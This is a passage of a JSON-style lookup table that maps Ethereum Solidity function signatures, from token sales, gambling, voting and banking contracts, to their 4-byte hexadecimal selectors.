"increasePlayersGooProduction(uint256)": "0xf9f71423", "place(uint8)": "0x1f9ab193", "LOTT()": "0x90f52ade", "ETQuality()": "0xa2497b5c", "store(address,address,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32)": "0xbd95264c", "GBBCOIN(uint256,string,string)": "0x4d964da6", "getPurchaseTimestampEnds()": "0x8cc4ab11", "updateInvestor()": "0xe38ff5dc", "updateAd(uint256)": "0x06cb0ea4", "setAdPriceMultiple(uint256)": "0x76918f5d", "getTaxDataSignatures()": "0xdd952089", "getPendingTaxData()": "0xe2f8fa16", "approveTaxData(uint256)": "0x3ce6d89b", "setPendingTaxParameters(address,uint256)": "0x86d01727", "getWalletFeeSignatures()": "0xdb2becb0", "getPendingWalletFeeData()": "0x9104b6f4", "approveWalletFeeData(uint256)": "0x6e974fd6", "setPendingWalletFee(address,uint256)": "0xacda01f6", "getAddReserveSignatures()": "0x92c00590", "getPendingAddReserveData()": "0x61a12160", "approveAddReserveData(uint256)": "0xc567f304", "setPendingReserveData(address,uint256,address)": "0xa01e1a21", "getKNCRateRangeSignatures()": "0x507b3450", "setKNCPerEthRate(uint256)": "0xbb912454", "getKNCRateRange()": "0x9ad1b348", "getPendingKNCRateRange()": "0x63929d3e", "approveKNCRateRange(uint256)": "0xfa1cee57", "setPendingKNCRateRange(uint256,uint256)": "0x725a731d", "setTaxWallet(address)": "0xea414b28", "setTaxInBps(uint256)": "0x9fad2dcb", "USDMToken()": "0xb3ed1957", "decBalance(address,uint256)": "0xaba00859", "incBalance(address,uint256)": "0x66e7ea0f", "EmbiggenToken(uint256,uint256,string,string,uint8)": "0x1301b876", "ownerTransferPHX(address,uint256)": "0x1a6253ed", "_pRand(uint256)": "0x7c9d564f", "PHXroll()": "0x63d1e70e", "PryvCn()": "0x0ca9c14e", "convertWeiToTokens(uint256)": "0x084ee60f", "StarsICO(uint256,uint256,uint256,address,address,address,address,uint256)": "0xe75864e4", "declareIcoFinished()": "0x810e78ab", "setIcoTokenSupply(uint256)": "0x666be68a", "Zorro01Token()": "0xdab8c01a", "TurkeyBurgerToken(uint256)": "0x4a950f00", "WenWanCoin()": "0x16c9b08d", "ISLToken(uint256,string,string)": "0xd25e3443", "setArtistAccount(bytes16,address)": "0x74b04fa7", "setTokenBaseURI(string)": "0x8ef79e91", "getTypeFromEdition(bytes16)": "0x2852ca81", "priceInWei(uint256)": "0x6af79112", "purchaseFromTime(uint256)": "0xe6db38c7", "editionOf(uint256)": "0x4be185f0", "isPurchased(uint256)": "0x2c9f4f62", "numberOf(bytes16)": "0xd5b0c0d5", "editionInfo(uint256)": "0xa92ca27d", "releasePendingTransfer(uint256)": "0x8e5d97a2", "updatePeriod()": "0xa83627de", "transfer(uint256,address)": "0xb7760c8f", "CircuitBreaker(address,address,uint256,uint256)": "0x6493d7fc", "createTarget()": "0xc98165b6", "contribute()": "0xd7bb99ba", "create(address)": "0x9ed93318", "callAndGetReturn(address,bytes,uint256)": "0xbf8783e0", "stringToSig(string,string)": "0x7c45ef6c", "andThen(string,address)": "0x5dc77e26", "setResolveHandler(bytes,address)": "0x9935935f", "resolve(uint256)": "0x4f896d4f", "secondChainedCallback(uint256)": "0x539e2bfb", "firstChainedCallback(uint256)": "0x302d350e", "resolveCallback(uint256)": "0x39e525f9", "TinyRouter(address)": "0xe94acf0e", "lockAndCall(string)": "0xc3ee6311", "increment()": "0xd09de08a", "get()": "0x6d4ce63c", "callback()": "0x083b2732", "DaoChallenge()": "0x57dc9760", "getIndex(uint256)": "0x8e7cb6e1", "length()": "0x1f7b6d32", "setIndex(uint256,uint256)": "0x2b16b56a", "push(uint256)": "0x959ac484", "List()": "0xc258ff74", "invoke(uint256)": "0x2b30d2b8", "invoke(uint256,uint256)": "0x33298e25", "donate()": "0xed88c68e", "withdraw(uint256)": "0x2e1a7d4d", "whitelistRemove(address)": "0xa932ed0d", "whitelistAdd(address)": "0x524fa7b9", "personUpdateDOD(uint256,int256)": "0x98866c1a", "personUpdateDOB(uint256,int256)": "0x61591a7c", "personUpdateRelation(uint256,string)": "0x0ce3151c", "personUpdateName(uint256,string)": "0x4a9b3f95", "personUpdateActivity(uint256,bool)": "0x0af658ca", "personAdd(string,int256,int256,string)": "0x09a399a7", "log(string,uint256)": "0xb60e72cc", "CharlyLifeLog(string,int256)": "0xc944a38e", "claimReward(uint256)": "0xae169a50", "joinProof(uint256)": "0x14cabddb", "initiateProof()": "0x58e29e17", "rejectRequest(uint256)": "0x2d7788db", "acceptRequest(uint256,bytes)": "0x998446a8", "requestIdentity()": "0x96ff7e97", "Pool(uint256)": "0x7fc90182", "_patternToNumber(bytes)": "0x7dc5cd32", "findNextYear(uint256,bytes)": "0x8e280dce", "findNextMonth(uint256,bytes)": "0xb245fc92", "findNextDay(uint256,bytes)": "0x54d9d6f8", "findNextWeekday(uint256,bytes)": "0xdcaa5620", "findNextHour(uint256,bytes)": "0x2f7f3ecf", "findNextMinute(uint256,bytes)": "0xc60ce271", "findNextSecond(uint256,bytes)": "0x96f0aa8f", "next(bytes,bytes,bytes,bytes,bytes,bytes,bytes,uint256)": "0xa3ec5616", "next(bytes,bytes,bytes,bytes,bytes,bytes,bytes)": "0x136af582", "toTimestamp(uint16,uint8,uint8,uint8,uint8,uint8)": "0x9054bdec", "toTimestamp(uint16,uint8,uint8,uint8,uint8)": "0x62ba9687", "toTimestamp(uint16,uint8,uint8,uint8)": "0x7f791833", "toTimestamp(uint16,uint8,uint8)": "0x8c8d98a0", "getWeekday(uint256)": "0x4ac1ad78", "getSecond(uint256)": "0x8aa001fc", "getMinute(uint256)": "0xfa93f883", "getHour(uint256)": "0x3e239e1a", "getDay(uint256)": "0x65c72840", "getMonth(uint256)": "0xa324ad24", "getYear(uint256)": "0x92d66313", "parseTimestamp(uint256)": "0xf97d0591", "getDaysInMonth(uint8,uint16)": "0xb238ad0e", "leapYearsBefore(uint256)": "0xb1999937", "isLeapYear(uint16)": "0xa6f0e577", "bytesToUInt(bytes,bytes)": "0xcc8af0fe", "uintToBytes(uint256,uint256)": "0x996a4be3", "computeNodeId(bytes,bytes)": "0xfa80918b", "computeIndexId(address,bytes)": "0x8e9ccd04", "check_depth(address,uint256)": "0x05d2f92a", "requires_depth()": "0x135217e7", "test_requires_depth(uint16)": "0x4afce471", "test_depth(uint256,uint256)": "0x8757a2cd", "set_sdl(address)": "0x2e817963", "ExampleResourcePool()": "0xeb947f19", "withdrawBond(uint256)": "0xc3daab96", "canWithdrawBond(address,uint256)": "0x157ad5a1", "canWithdrawBond(uint256)": "0xae6c0b03", "depositBond()": "0x741b3c39", "getBondBalance(address)": "0x33613cbe", "getBondBalance()": "0x3cbfed74", "getMinimumBond()": "0x23306ed6", "isInPool(address)": "0x8baced64", "isInPool()": "0x1ae460e5", "isInNextGeneration(address)": "0xd1734eac", "isInNextGeneration()": "0x125b8f06", "isInCurrentGeneration(address)": "0x400aae08", "isInCurrentGeneration()": "0x7c47965e", "isInGeneration(address,uint256)": "0x7772a380", "getNextGenerationId()": "0xa502aae8", "getCurrentGenerationId()": "0xb0171fa4", "exitPool(address)": "0xba5a2d33", "exitPool()": "0x29917954", "lastImageId()": "0x7bee86d6", "crowdsaleOwner()": "0x85565585", "fullTokenWallet()": "0x62d3755b", "contractStakeToken()": "0x5f8aaef7", "currentChallenge()": "0x51bdd585", "fuzexAccount()": "0x18b38777", "frontWindow()": "0xb670a910", "tokensRemainder()": "0x8bd61f26", "presale1()": "0x05365bb0", "secondDiscountPrice()": "0x45c531f3", "getNextRules()": "0xc0934c45", "chunk2IsAdded()": "0x3a5dd603", "inSalePeriod()": "0x32c862ed", "isEarlybird()": "0x8a9cf23a", "lastEventId()": "0x054e9507", "TOTAL_TOKEN_SUPPLY()": "0xccf053ba", "maxWeiUnverified()": "0xb36f2c30", "addressOps()": "0xaee2988d", "teamTwoShares()": "0x177cfaa2", "totalAdvisorsSupply()": "0xd5e0e131", "saleQuantity()": "0xe336e01d", "endTimeSale2()": "0xc807be58", "lockPurchase()": "0x62491332", "tokenPriceWei()": "0x05d0f15b", "totalNum()": "0x04a7ff18", "ALC_DECIMALS()": "0xfe6d4305", "GetAdminAddress()": "0x482b27c9", "releaseTimeTeamAdvisorsPartners()": "0x81350bd4", "peggedSymbol()": "0x33a263e6", "cooperateRewardSupply()": "0x893b746a", "icoSender()": "0xde28fc1d", "saleStartTokenCreationRate()": "0xf1991a27", "BONUSTWO_DATE()": "0x2957ca33", "LOCKTC()": "0xa67909bd", "numTokensAuctioned()": "0xba5595d3", "enableMix()": "0x94cace04", "manualDraw()": "0xdacfa06f", "numerai()": "0x29684907", "INITIAL_COINS_FOR_VIPPLACEMENT()": "0x92d588a0", "bonusTokensPercent()": "0xdaca5ce0", "maximumBuyBackAmountInCents()": "0xa7f49e1d", "gameStarterDividendPercentage()": "0xf36db900", "icoEnabled()": "0xd5c06d30", "thirdStageMintingDate()": "0x1107fa00", "totalReturns()": "0x00c43503", "totalZTHWagered()": "0x04fcadf1", "COIN_SUPPLY_ICO_PHASE_3()": "0x02704a4d", "presaleFinalizeAgent()": "0xb31d7730", "startBetBlue()": "0xb27bcaea", "issuedTokens()": "0xb534b5b7", "PUBLICSALE_STARTTIMESTAMP()": "0x4f25a319", "individualRoundCap()": "0x8e7fffe8", "itemsPerPage()": "0x72b614af", "earlyBackerSupply()": "0x39a5fdda", "communityMultisig()": "0x349d8b4e", "offChainTokens()": "0x4a5fca4f", "lockAmount()": "0xd8df5dc1", "toBeRaised()": "0x110fd65f", "startTimestampIco()": "0x424ea872", "exchanged()": "0x7182774d", "foundersTeam()": "0xcefa80fc", "ETHCollected()": "0xdaed6726", "round0StartTime()": "0x1a7cf619", "deathFactor_iii()": "0x4026c101", "maxActiveCastle()": "0xa0c66b43", "saleWasSet()": "0x6fe7f51c", "AddrRewardPlan()": "0x57e6a64c", "indAddress()": "0x70f199d2", "matchCount()": "0x79c4264b", "root_domain()": "0x138716e8", "deposit_address()": "0x96ad6c8a", "comunityMintedTokens()": "0xe41fb842", "restartPrivatePlacement()": "0xb37a6a2c", "holdAddress2()": "0x94b8896c", "maxAllowedBetInEth()": "0xa34945db", "stopsale()": "0xaea64763", "employeeSignsToESOP()": "0xfa66e143", "ALC_FOUNDATION_ADDRESS()": "0x9c9b8fcc", "summAdvisors()": "0xc0e738ef", "product2_sell()": "0x3917b761", "originalTotalWeight()": "0x49716f5a", "bonusPrice()": "0x65cf3a48", "m_ETHPriceUpperBound()": "0x5b7214b6", "etherMinimum()": "0x675cef14", "walletTeam()": "0x688ba636", "isSafeHavenToken()": "0x7ee2ea76", "requestRand()": "0x553f4fb3", "eachCandy()": "0x10af92ba", "paused_2()": "0xb6f529d6", "feesC()": "0xbc2010cc", "ownerWallet()": "0x9335dcb7", "preSaleDurance()": "0x5c10ec87", "whitelistedCount()": "0xb2a1de22", "roundOneLimit()": "0xe25209b6", "openTheRabbitHole()": "0x0c6bfdd0", "limit8()": "0xc36360f2", "lastIdGen0()": "0x731f49b7", "taylorToken()": "0x38419800", "getPaused()": "0x6805b84b", "priceInWei()": "0x3c8da588", "addMessageRequest(address,address[],string)": "0xdaded88e", "lottery(int8)": "0x51ee43e5", "stopBet()": "0x74b38531", "submitOrder(bytes)": "0x5f185329", "changeMicroPay(address)": "0xb6edc68f", "publicSale()": "0x33bc1c5c", "setInvestxPlatform(address)": "0x2aca2b16", "addAddressToFounders(address)": "0x80c18d45", "PiPiCoin()": "0x45a8d80e", "Webrypto()": "0x903d9b2f", "createPlayer(address,uint256)": "0x36edbe17", "createEmptyTrack()": "0x80b6518a", "isEndedTrack(uint256)": "0x96fd1df7", "isReadyToStart(uint256)": "0xaeb9c40e", "getPortfolio(uint256,address)": "0x01ff8961", "setPortfolio(uint256,bytes32[],uint8[])": "0xae46e284", "getCountTrack()": "0x0ebe31c8", "getPlayersByTrackId(uint256)": "0xc4069caf", "getCreatorByTrackId(uint256)": "0xea31b291", "getCountReadyPlayerByTrackId(uint256)": "0x5418bea9", "getCountPlayerByTrackId(uint256)": "0xb2e33c8f", "newTrack()": "0x883cdeb9", "IPv7Token()": "0x7b367343", "OkkamiToken()": "0x57646d5d", "unfrozenType(string)": "0x095228b5", "frozenType(string)": "0x53799e7d", "allotToken(uint256)": "0x9d6a4d77", "initFrozenTokenMap()": "0x5c261556", "ValithToken()": "0x1f44b1de", "ZhangPeiPei(uint256,string,uint8,string)": "0xe07f0f13", "callSender(address,bytes4)": "0xea00fad4", "updateShareAddress(address,address)": "0x9df21bfd", "updateShareValue(address,uint256)": "0xc49a1ede", "newShare(address,uint256)": "0x619385bd", "getShare(address)": "0x4b3ab9c5", "getIndex(address)": "0xb31610db", "changeYumAddressTo(address,address)": "0xa51b79e3", "changeOwnerTo(address)": "0x5c5204d6", "sendNextRewardTo(address)": "0x8804d119", "calcNextReward()": "0xd586e30f", "BITHELPTOKEN()": "0xec801286", "addTotalSupply()": "0x3d8c3dc9", "HeyToken()": "0x20592076", "Sentivate()": "0x0a7fc3df", "mintTeam(address,uint256)": "0x93f84cfe", "HitToken(string,string,uint8,uint256)": "0x9d6adeaf", "huroc()": "0x1e18c404", "MarkRead()": "0x3a300490", "send(address,string)": "0x99142b5f", "DaxtherCrowdsale()": "0x180afbf6", "Daxther()": "0xffe575b1", "_calcRelease()": "0xcb0b6161", "internalBuyTokens(address,address)": "0xfdbaf779", "removeODEMClaim(address,bytes32)": "0xb29f7f9e", "setODEMClaim(address,bytes32,bytes,bytes32)": "0x8092285e", "getODEMClaim(address,bytes32)": "0x33242b60", "resolveAddressLight(address)": "0x3bb2dead", "addAddressAliasUnsafe(address,address)": "0x77e49660", "addAddressAlias(address,address)": "0xe83ce1f9", "roleAddressAliaser()": "0x00e756cc", "setRBACAddress(address)": "0x31d87de2", "roleAdmin()": "0x93867fb5", "gameActiveStrRef(string)": "0xca0c0a49", "createOption(uint256,string)": "0x10a2f7cb", "createPoll(string)": "0x74a9ced9", "getOptionIdForPoll(uint256,uint256)": "0x7a51a611", "getOptionTitleForPoll(uint256,uint256)": "0xa54677e3", "createOption(uint256,bytes32)": "0xecf41c8c", "createPoll(bytes32)": "0xc6befedf", "GouShiTokenFunc()": "0xa013e4d0", "showMoseEvent(uint32)": "0x2f148f55", "publishResult(uint32,string)": "0x57d55367", "attend(uint32,string)": "0x3b0f3ed3", "VEToken(uint256,string,string)": "0x5e0842d7", "getTransfer(uint256)": "0xc16fe907", "lockforTransfer()": "0x83c99722", "createPixel(uint24,uint32)": "0xe000eec3", "getPixel(uint256)": "0xb4f80eb9", "_modifyPixelColor(uint24,uint32,address)": "0xf53fd201", "_createPixel(uint24,uint32,address)": "0xcade3a5d", "SurvivalRanchTestCoin()": "0x9715a81f", "getOneself()": "0xb373a48b", "addVote(uint256,address)": "0x129b873b", "addVotes(uint256)": "0x94a1be9c", "burnBalances()": "0x270f611f", "burnVotes()": "0x99cf5582", "removeVoters(uint256[])": "0x62c655f5", "addVoters(address[],bytes32[])": "0x3b8ffa5e", "issuerGuiveToken(address,uint256)": "0xf16c5e8d", "setIssuer(address,uint256)": "0x55728d04", "lolita()": "0x8832ebe8", "getContactRecord(string)": "0xad6b9499", "addContactRecord(string,string,string,address,string,string,int256,string,int256,address,string,int256)": "0x7c38ee53", "getSecondaryRecord(string)": "0x12032e52", "addSecondaryRecord(string,bool,string,bool,string,string,string)": "0x8d553538", "getPrimaryRecord(string)": "0x7f45b835", "addPrimaryRecord(string,string,string,string,string,string,string)": "0xbc86a23a", "HashnodeTest()": "0x64253d2f", "sendAmount(uint256,address)": "0x5120f028", "getIsWinnerSelected()": "0x4846f559", "aggiungi_candidato(string)": "0xe91723b2", "submitPlaintext(uint32,uint32,uint256,uint256)": "0x5302470a", "buyChance(uint32,uint32,bytes32,uint256)": "0x15b8003b", "postGoods(string,uint32,string,uint256)": "0x69d1d1ca", "user(uint32,uint32)": "0x7b17e543", "goods(uint32)": "0x578551aa", "topGoodsId()": "0xd45a717e", "OneChance(address,address,address)": "0x23adeb05", "consume(uint32,uint32)": "0x0aa83f5a", "mint(address,uint32,uint256)": "0xca3181e0", "initOneChance(address)": "0x03bcebea", "OneChanceCoin(string,string,uint8,address,address)": "0xc225752c", "regist(address)": "0xff776f55", "shobozilToken()": "0x484dd472", "getScores()": "0x1ea1380c", "getFlightInfo(uint16,uint16)": "0x2cf91024", "getAction(uint8)": "0x5254c846", "getCity(uint16)": "0xe023f90e", "setFlight(uint16,uint16,uint256,uint256)": "0x22f7be85", "addCity(bytes32,uint256,uint256)": "0xbc4f65a3", "addAction(bytes32,bytes32,string,uint256,bool,uint256,uint256)": "0xd52a3524", "playerAction(uint256,uint8)": "0xe85061ca", "playerFastFlight(uint256,uint16)": "0x68a7f6d6", "changeScore(uint256,uint256)": "0xe4e2d2ae", "playerFlight(uint256,uint16)": "0xe86701e0", "playersCount()": "0xa3f67d6d", "registerPlayer(address,bytes32)": "0xc566d43c", "innerPlayerFlight(uint256,uint16,uint256)": "0xdfa72237", "sum(uint256,uint256)": "0xcad0899b", "ITSM()": "0xf3ecda21", "revokeRound(uint256)": "0x1a799617", "roundWithdraw(uint256)": "0xf61a3e2b", "updateRoundEndTime(uint256)": "0x9fcf4115", "buyRoundKey(uint256)": "0x42618b91", "isRoundEnded(uint256)": "0x7b831c30", "getRoundPlayerKeys(uint256)": "0xd1351e94", "getRoundKeyPrice(uint256)": "0x1fc6e13a", "getRoundAmtPot(uint256)": "0x79341ca1", "getRoundLuckyPot(uint256)": "0xceff149b", "getRoundWinnerPot(uint256)": "0xb74feb18", "getRoundBonusPot(uint256)": "0x52ae68f6", "getRoundJackPot(uint256)": "0x5ae8daea", "getRoundCurKeyNo(uint256)": "0x7f6150cb", "getRoundEnd(uint256)": "0x6bf4223b", "getRoundStart(uint256)": "0xcf16cc83", "receiveEth(uint256)": "0xc2aaf9c4", "verifyDocument(bytes32,bytes,uint16)": "0xcbe335c1", "IBIZACASH()": "0x134ccdfb", "CANSale()": "0x80033408", "doMigrate()": "0xec7c06be", "AnitiToken(address,uint256,uint256)": "0x6fbcd0f6", "TimeStamp()": "0xe177644a", "TimeStampSubstructOneDay()": "0x52f8a766", "CheckoutLimDay(address,uint256)": "0x7021fad7", "CheckLimTransferDay(address)": "0x0383a6f0", "CheckTimestampsDuringOneDay(address)": "0xaa99ebb6", "ProvToken()": "0x42a1f3eb", "MaPToken2()": "0x6af53f2f", "FW(uint256,string,uint8,string)": "0x6bee5131", "fechVoteNum(address)": "0x2351baca", "calVote(address)": "0x18577f8d", "calCandidate(address)": "0xbefb6e56", "cancelVote(address,uint256,uint256)": "0x6cf75170", "multiCancelVoteForCandidate(address[],uint256[])": "0x13e1d1d2", "FucksToken9()": "0xbbb104cf", "getCourseIdOfStudent(address)": "0x0c68194f", "rejectCertificate(address)": "0xe085f82b", "approveCertificate(address)": "0x2f8f8c0b", "getNumberOfRequests()": "0x97388497", "applyForCertification(string,string,string,string,address,uint128)": "0x03adaee6", "getNumberOfCourses()": "0x90ebed43", "addNewCourse(int128,string,string,string,string)": "0xd56cd796", "CPWAToken()": "0xe4b5e557", "ganeshrajToken()": "0xea4efa5d", "informOffChainBuy(address[],bytes32[])": "0x923db49b", "AppCoinsIAB()": "0xb85e0402", "stopDistribution()": "0xdffbbef5", "assignReward(address,uint256)": "0xd500ca00", "verifyDocument(bytes32,bytes32[])": "0xb2138754", "JuraToken(uint256,string,string)": "0xc48d93d8", "SelfDesctruction()": "0x683431e2", "safe(uint256,string,string)": "0x97365a0b", "registerCustomer(address)": "0x7520320f", "checkExpired()": "0x25ace2a7", "buyAddress(address,bytes8,uint256)": "0xd529a072", "buy_ETH(uint256,bytes8)": "0xa79f4773", "ReferralActivated(address)": "0x7874b66f", "checkInventory(uint256)": "0xe9f998ce", "getReferral()": "0x329b1c92", "getETHUSD()": "0x96c38294", "getMaintainFee()": "0x43302ff3", "getReferralCode()": "0x7ae68ada", "setCouponRatio(uint32)": "0x1a7b9fe7", "setPrice(uint32)": "0xdaafe0a5", "getValidated(address,address,uint256)": "0x81cbeaf0", "_createPassport(address)": "0x382f8411", "createPassportByOwner(address)": "0xcb1fc276", "createPassport()": "0x2ec0faad", "addClaim(uint256,uint256,address,bytes,bytes,string)": "0xb1a34e0d", "getClaimIdsByTopic(uint256)": "0x80e9e9e1", "getRealBet(uint256)": "0x1dea0c57", "getRate(uint256)": "0x57764094", "prepareRoll(uint256,uint256,uint256)": "0x2f1927cb", "investorAddFee(uint256)": "0x414ceac0", "makeRoll(uint256)": "0x9a7a7c11", "setJackpot()": "0xe97db66e", "OwnerGetFee()": "0xe9b93569", "OwnerCloseContract()": "0x54738157", "PrepareRoll(uint256)": "0x25209260", "DoRoll()": "0x4247f52d", "CancelMyInvestment()": "0x7dee2cad", "GetMyInvestmentBalance()": "0xf9983a12", "Invest()": "0xc0819961", "Investors(address)": "0xe8930efd", "BetPriceLimit()": "0x860e9960", "ChanceOfWinning(uint256)": "0x149c5066", "dEthereumlotteryNet(address,address,bool,address)": "0x3e5fd9b5", "newWinner(uint256,address,uint256,uint256,uint256)": "0xd743ca38", "Winners(uint256)": "0x6103d915", "getRandom()": "0xaacc5a17", "killContract()": "0x1c02708d", "changeMemberAddress(address)": "0x63deb2c5", "addMember(address,string)": "0xc127c247", "profitDisperser()": "0xb4d9cc3a", "claimOwnership()": "0x4e71e0c8", "getGamblesList(uint256)": "0xbcb3b5d2", "checkMyBet(address)": "0x6e1b6bcc", "getPayroll()": "0x942385eb", "getFirstActiveGamble()": "0xa0e2abf7", "getSettings()": "0x85b4bb53", "investmentEntryCost()": "0xf9e27106", "getInvestorList(uint256)": "0x6ed43eb0", "checkInvestorBalance(address)": "0xf7ae9421", "checkProfitLossSinceInvestorChange()": "0x2c6b2c92", "updateBalances()": "0x6f3fe404", "manualUpdateBalances()": "0xb18c6847", "withdrawInvestment(uint256)": "0x2037fcbf", "invest()": "0xe8b5e51f", "checkBetColumn(uint8)": "0x06c1df7b", "checkBetDozen(uint8)": "0xc124e2ea", "checkBetColor(uint8)": "0xc1ae4044", "checkBetLowhigh(uint8)": "0xf80b3cfa", "checkBetParity(uint8)": "0x57006864", "checkBetNumber(uint8)": "0x86269a88", "solveBet(address,uint8,bool,uint8)": "0x021c309a", "updateFirstActiveGamble()": "0x403abbc7", "spinTheWheel()": "0xd02bf162", "betOnColumn(bool,bool,bool)": "0xe548cf13", "betOnDozen(bool,bool,bool)": "0xbfe8c107", "betOnOddEven(bool,bool)": "0xb738169c", "betOnLowHigh(bool,bool)": "0xadf54e0c", "betOnColor(bool,bool)": "0x5b7d47a9", "betOnNumber(uint8)": "0xb400d149", "updateStatusPlayer()": "0xb8cf14e7", "checkBetValue()": "0x53f818d6", "updateMaxBet()": "0x2888f9d0", "changeSettings(uint256,uint256,uint256,uint8,uint256,uint256,uint8,uint8)": "0x63a8dac2", "enableBetting()": "0x5fa21f1f", "disableBetting()": "0xc87b36ed", "changeDeveloper(address)": "0x31119b4d", "Rouleth()": "0xd6af9411", "Inscription(string)": "0x671fa0a0", "Security_GetNumberOfAttemptsToConnectBankAccountToANewOwnerAddress()": "0xf6232556", "Security_ConnectBankAccountToNewOwnerAddress(uint32,string)": "0x766a3f2e", "Security_AddPasswordSha3HashToBankAccount(bytes)": "0xb45c48dc", "Security_HasPasswordSha3HashBeenAddedToBankAccount()": "0xaf27c7b3", "TransferAmountFromBankAccountToAddress(uint256,address)": "0x19663f7f", "WithdrawFullBalanceFromBankAccount()": "0x85c7a953", "WithdrawAmountFromBankAccount(uint256)": "0x13651124", "DepositToBankAccountFromDifferentAddress(uint32)": "0x62b24189", "DepositToBankAccount()": "0x9a9c9c53", "GetBankAccountBalance()": "0xcf2e3efc", "GetBankAccountNumber()": "0x25f3da52", "OpenBankAccount()": "0x32829a23", "BankOwner_DisableConnectBankAccountToNewOwnerAddress()": "0x9be1fcee", "BankOwner_EnableConnectBankAccountToNewOwnerAddress()": "0x2dae9878", "BankOwner_WithdrawDonations()": "0x07718a3b", "BankOwner_GetDonationsBalance()": "0xb774d3d7", "Donate()": "0xd917deb5", "MyEtherBank()": "0xbcc6092a", "vote(uint256,bool,string)": "0xd3c0715b", "newProposal(address,uint256,string,bytes)": "0xb1050da5", "changeVotingRules(uint256,uint256,int256)": "0xbcca1fd3", "changeMembership(address,bool,string)": "0x9644fcbd", "Congress(uint256,uint256,int256,address)": "0x3b143184", "vote(bytes,bool)": "0xb21bce4c", "Currency(string,string)": "0x68f2ab8e", "issueAndCommit(address,address,uint256,uint256)": "0x60708ae3", "commit(address,uint256,uint256)": "0xc74e907b", "Security(string,string)": "0x1d8ae626", "settle(address,address,uint256,uint256)": "0xa5b1e13d", "refundCurrency(address,uint256,uint256)": "0xc9cfac55", "refundSecurity(address,uint256,uint256)": "0x144267e0", "commitCurrency(address,uint256,uint256)": "0x6d09e2ec", "commitSecurity(address,uint256,uint256)": "0xf34c7010", "Exchange(address,address)": "0xa925d85e", "Administered()": "0xd449ce7c", "_refund(uint256)": "0x23df9df5", "setOperationsCallGas(uint256)": "0x8f0c724c", "updateRefundGas()": "0x24c65f35", "IcoPaused()": "0x75ee7315", "rateTierHigher()": "0x0e0b3519", "fastHatchingPrice()": "0xe182e27a", "serviceController()": "0x5447fab0", "chefOwner()": "0x39d216f2", "coinContract()": "0x72dd52e3", "daoManager()": "0xf322c755", "maximumBuyBack()": "0x5c7c43fa", "tokenCapForFourthMainStage()": "0xda74ce27", "urbitAdminAddress()": "0xe19136a4", "cards()": "0x58a4903f", "maxTokensToSold()": "0x536dd8f9", "DROP()": "0x3d58d0c3", "bonusCapUSD()": "0x80a3f9b3", "policyCandyBalance()": "0x78960df6", "statePhase()": "0x1a44731c", "getostToken()": "0xe31a0292", "starbaseToken()": "0xc9b8020d", "totalPreSale()": "0xe346b380", "receiveDonation()": "0x45d3292b", "MAX_TOKEN_SUPPLY()": "0xe489d510", "checkGuess()": "0xc7591d35", "numberWhitelisted()": "0x6b8f155a", "EndDate()": "0x1954f39e", "tgrNumber()": "0xb1782d18", "MarketingDevelopmentAddress()": "0x7cd30fe3", "freezeAdministrationContract()": "0x1181a459", "first_pay()": "0x2e0ca1ee", "LIQUID_TOKENS()": "0xe7a4d9d3", "capHicsToken()": "0x3e24fcbf", "totalUnitsLeft()": "0xfe800489", "Mine_Block()": "0x06a98f0a", "Police_4()": "0x9f5a5ff8", "HEAD()": "0x1a701609", "PRE_DURATION()": "0x6e3706c8", "otherAddress()": "0xc4e6c604", "MENTORS()": "0x47695e60", "cliffPercent()": "0xe67e8aaf", "unlockTimeLine()": "0x9ab361a2", "getTotalDistributed()": "0x5695fa58", "TotalPot()": "0x1237b2a6", "penaltyDisbursalAddress()": "0xfdd4fd69", "sendPer()": "0x323d5c68", "SALE_3WEEK_BONUS()": "0x747cb030", "getRateAt()": "0xeeb2d26b", "percentBank()": "0x346a2f9e", "GrowthPool_Supply()": "0x5ebad2ab", "precommitmentAdjusted()": "0xf59db647", "withdrawTokensToAdvisors()": "0xe844ca34", "totalMineSupply()": "0x1c58c3ff", "getEtherBalanceOnCrowdsale()": "0x40e5f3cb", "softCapTokensAmount()": "0xe0efdaf9", "etherRaised()": "0xcd72ab69", "proposedTotal()": "0x65ed8a4a", "hodling()": "0x7844ce81", "EQUIPMENT_REWARD_WALLET()": "0xae366735", "ReinvestWallet()": "0x344d9576", "teamNIMFAAddress()": "0xe06e82b2", "soldPreSaleTokens()": "0x0cc87b1c", "REQUEST_CANCELED_BY_LENDER_STATUS()": "0xc32e16e7", "sponsoredBonusMax()": "0xb65b4c9a", "saleStartTimestamp()": "0x3c276d86", "incentivisingAddress()": "0x1cf25dc9", "assetToken()": "0x1083f761", "CEO_SHARE()": "0xe5e7a136", "initDepositAccount()": "0xafc3c31f", "battlesTillBattleCooldown()": "0x3852c53f", "nextNumberOfWagersToMinimumTimeout()": "0x5b6427fc", "deathData_a9()": "0x633a6dde", "promoTokenController()": "0xc04ecdb8", "contactInformation()": "0x36f7ab5e", "SellToken()": "0x01e11c29", "trackingNo()": "0xb3344593", "ROLE_STATE_PROVIDER()": "0x8353bb51", "GAME_SUPPLY()": "0x52fdcc65", "maxIssuedWithAmountBasedBonus()": "0x21188011", "distributeA()": "0x6b0c9d6a", "generalManager()": "0x96ebfb89", "maxgas()": "0x0d6f7ca3", "hostAddress()": "0xd2da29c7", "FACTOR_6()": "0xdf13569d", "totalConsideredFundedEther()": "0xae708e7c", "priceGuaranteed()": "0xb7dc5c11", "toggleBurn()": "0x778a56ce", "badgeCount()": "0x5b806645", "TeamPoolAddress()": "0xf4156757", "notice()": "0x9c94e6c6", "shitFund()": "0x6a5fd362", "tokensPerWeiBonus333()": "0x3777f5d0", "getPlayerBets()": "0x48a60b6c", "upgrading()": "0x02836f24", "token_ratio()": "0x5c5991d4", "isAmountBonus()": "0x93545a79", "investmentAddress()": "0x53030d91", "referralManager()": "0x2ccd9623", "unsoldAllocatonScheduled()": "0x01d92dc8", "WINNER_COUNTRY_CODE()": "0x7726a59a", "__address4__()": "0x7453a417", "patronRewardMultiplier()": "0x80657151", "sessionBlockSize()": "0x64f951e9", "fullPrice()": "0xedd634b8", "trickleDownBonusesReleased()": "0x5a32d070", "phase_4_bonus()": "0x181b591a", "afterForkBlockNumber()": "0x00fec4ba", "AVAILABLE_IN_PRE_SALE()": "0x5022238f", "MiningRewardPerETHBlock()": "0x231ace68", "globalMin()": "0xf9c638ea", "getBackEther()": "0x3bd0dd47", "MAX_SALE_DURATION()": "0xfc6e33ee", "OvisAddress()": "0xbdb5daf5", "disbursementWei()": "0x6bb3130e", "BONUS_DAY2_DURATION()": "0x1a76e30c", "inviteIter_()": "0x6f863c21", 